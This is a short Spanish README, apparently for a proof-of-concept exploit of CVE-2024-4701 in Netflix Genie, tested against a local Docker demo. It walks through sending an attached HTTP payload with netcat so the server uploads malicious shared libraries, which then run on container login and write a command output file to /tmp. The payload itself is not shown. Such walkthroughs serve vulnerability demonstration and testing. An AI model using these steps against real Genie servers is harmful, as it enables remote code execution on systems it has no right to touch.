
POC para CVE-2024-4701
POC para CVE-2024-4701
Descarga el archivo docker de genie desde https://netflix.github.io/genie/docs/4.3.0/demo/docker-compose.yml o desde este repositorio
Ejecuta
docker-compose up
Descarga el payload http adjunto loadlib
Ejecuta el siguiente comando
nc -w 5 localhost 8080 < loadlib
Puede que necesites instalar netcat ( nc )
Esto enviará el payload a la aplicación genie que se ejecuta en docker, la cual sube los archivos pe.so y ld.so.upload.
Luego inicia sesión en el contenedor docker de genie-app
docker exec -it genie_demo_app_4.3.0 /bin/bash
El acto de iniciar sesión desencadena la ejecución de la biblioteca maliciosa, así que en ese momento ejecuta
ls /tmp/
Para ver el archivo command.out escrito en el disco.